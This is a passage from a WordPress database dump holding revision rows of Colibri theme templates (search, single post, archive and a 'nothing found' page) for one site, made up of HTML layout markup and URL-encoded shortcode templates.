<hop-archive-navigation previewid=\"639-m22\" hmodel=\"[object Object]\" parentmodelobj=\"[object Object]\" rootmodel=\"[object Object]\" ispreview=\"true\" class=\"h-element\"></hop-archive-navigation>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','main_search','','inherit','closed','closed','','40-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',40,'https://gsudice.dataconn.net/?p=82',0,'revision','',0),(86,1,'2022-02-15 15:45:54','2022-02-15 15:45:54','<div data-colibri-id=\"31-m1\" class=\"style-66 style-local-31-m1 h-overflow-hidden position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"31-m2\" id=\"blog-post\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-67 style-local-31-m2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"31-m3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 colibri-dynamic-list colibri-single-post-loop style-72 style-local-31-m3 position-relative\">\n <!---->\n <div data-colibri-component=\"\" class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <!---->[colibri_loop]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-73-outer%20style-local-31-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%2231-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-73%20style-local-31-m4%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%2231-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20style-74%20style-local-31-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-31-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22false%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2231-m6%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-75%20style-local-31-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-76-outer%20style-local-31-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-76%20style-local-31-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m8%22%20class=%22h-blog-meta%20style-77%20style-local-31-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2231-m9%22%20class=%22style-78%20style-local-31-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22colibri-post-content%20h-global-transition-all%22%3E%5Bcolibri_post_content%5D%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%2231-m10%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-79%20style-local-31-m10%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-80-outer%20style-local-31-m11-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m11%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-80%20style-local-31-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m12%22%20class=%22h-text%20h-text-component%20style-81%20style-local-31-m12%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ECategories:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20style-82-outer%20style-local-31-m13-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-82%20style-local-31-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m14%22%20class=%22h-blog-categories%20style-83%20style-local-31-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%5Bcolibri_layout_wrapper%20name=%22tags_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%2231-m15%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-84%20style-local-31-m15%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-center%20align-items-md-center%20align-items-center%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-85-outer%20style-local-31-m16-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m16%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-85%20style-local-31-m16%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m17%22%20class=%22h-text%20h-text-component%20style-86%20style-local-31-m17%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ETags:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-87-outer%20style-local-31-m18-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m18%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-87%20style-local-31-m18%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m19%22%20class=%22h-blog-tags%20empty-preview%20style-88%20style-local-31-m19%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_tags%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22navigation_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%2231-m20%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-89%20style-local-31-m20%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-90-outer%20style-local-31-m21-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m21%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-90%20style-local-31-m21%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m22%22%20class=%22post-nav-button%20hide-title%20style-91%20style-local-31-m22%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22prev%22%20prev_post=%22Previous%20post%22%20next_post=%22Next%20post:%22%20show_title=%22false%22%20title_length=%2240%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-92-outer%20style-local-31-m23-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m23%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-92%20style-local-31-m23%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m24%22%20class=%22post-nav-button%20hide-title%20style-93%20style-local-31-m24%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22next%22%20prev_post=%22Previous%20post:%22%20next_post=%22Next%20post%22%20show_title=%22false%22%20title_length=%2230%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"31-m29\" id=\"comments\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-94 style-local-31-m29 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"31-m30\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-99 style-local-31-m30 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-100-outer style-local-31-m31-outer\">\n <div data-colibri-id=\"31-m31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-100 style-local-31-m31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"31-m32\" class=\"style-101 style-local-31-m32 position-relative\">\n <!---->\n <div class=\"h-global-transition-all blog-post-comments\">[colibri_post_comments none=\"No responses yet\" one=\"One response\" multiple=\"{COMMENTS-COUNT} Responses\" disabled=\"Comments are closed\" avatar_size=\"30\"]</div>\n </div>\n <div data-colibri-id=\"31-m33\" class=\"position-relative\">\n <!---->\n <div class=\"h-global-transition-all\">[colibri_post_comment_form]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','main_post','','inherit','closed','closed','','31-revision-v1','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',31,'https://gsudice.dataconn.net/?p=86',0,'revision','',0),(87,1,'2022-02-15 15:45:54','2022-02-15 15:45:54','<div data-colibri-id=\"34-m1\" class=\"style-103 style-local-34-m1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"34-m2\" id=\"blog-posts\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-104 style-local-34-m2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"34-m3\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-2 gutters-row-v-3 colibri-dynamic-list style-109 style-local-34-m3 position-relative\">\n <!---->\n <div data-colibri-component=\"masonry\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-2 gutters-col-v-3 style-109-row style-local-34-m3-row\">\n <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-6%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-110-outer%20style-local-34-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%2234-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-110%20style-local-34-m4%20h-overflow-hidden%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-href=%22%5Bcolibri_post_link%5D%22%20data-colibri-component=%22link%22%20%20data-colibri-id=%2234-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20style-111%20style-local-34-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-34-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22true%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m6%22%20class=%22h-row-container%20gutters-row-lg-3%20gutters-row-md-3%20gutters-row-3%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-112%20style-local-34-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-3%20gutters-col-md-3%20gutters-col-3%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-113-outer%20style-local-34-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%2234-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-113%20style-local-34-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2234-m8%22%20class=%22h-blog-meta%20style-114%20style-local-34-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m9%22%20class=%22h-blog-meta%20style-115%20style-local-34-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m10%22%20class=%22h-blog-title%20style-116%20style-local-34-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m11%22%20class=%22style-117%20style-local-34-m11%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%2216%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m12%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-118%20style-local-34-m12%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-119-outer%20style-local-34-m13-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%2234-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-119%20style-local-34-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2234-m14%22%20class=%22h-blog-meta%20style-120%20style-local-34-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%224%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_comments_url%5D%22%3E%3Cspan%20%20class=%22h-svg-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/comments%5D%3C/span%3E%5Bcolibri_post_meta_comments_content%5D%3C/a%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-121-outer%20style-local-34-m15-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%2234-m15%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-121%20style-local-34-m15%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%2234-m16%22%20class=%22h-x-container%20style-122%20style-local-34-m16%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-34-m16-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-123-outer%20style-local-34-m17-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%2234-m17%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-123%20style-local-34-m17%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-123-icon%20style-local-34-m17-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/arrow-right%5D%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n </div>\n </div>[colibri_layout_wrapper name=\"navigation_container\"]\n <div data-colibri-id=\"34-m18\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-124 style-local-34-m18 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-end justify-content-md-end justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-125-outer style-local-34-m19-outer\">\n <div data-colibri-id=\"34-m19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-125 style-local-34-m19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"34-m20\" class=\"style-126 style-local-34-m20 position-relative h-element\">\n <!---->\n <div class=\"archive-nav-button h-global-transition-all\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Previous\"]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-127-outer style-local-34-m21-outer\">\n <div data-colibri-id=\"34-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-127 style-local-34-m21 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"34-m22\" class=\"style-128 style-local-34-m22 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-129-outer style-local-34-m23-outer\">\n <div data-colibri-id=\"34-m23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-129 style-local-34-m23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"34-m24\" class=\"style-130 style-local-34-m24 position-relative h-element\">\n <!---->\n <div class=\"archive-nav-button h-global-transition-all\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>[/colibri_layout_wrapper]</div>\n </div>\n</div>','main_archive','','inherit','closed','closed','','34-revision-v1','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',34,'https://gsudice.dataconn.net/?p=87',0,'revision','',0),(88,1,'2022-02-15 15:45:54','2022-02-15 15:45:54','<div data-colibri-id=\"37-m1\" class=\"style-131 style-local-37-m1 position-relative\">\n <!---->\n <div data-colibri-id=\"37-m2\" id=\"nothing-found\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-132 style-local-37-m2 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 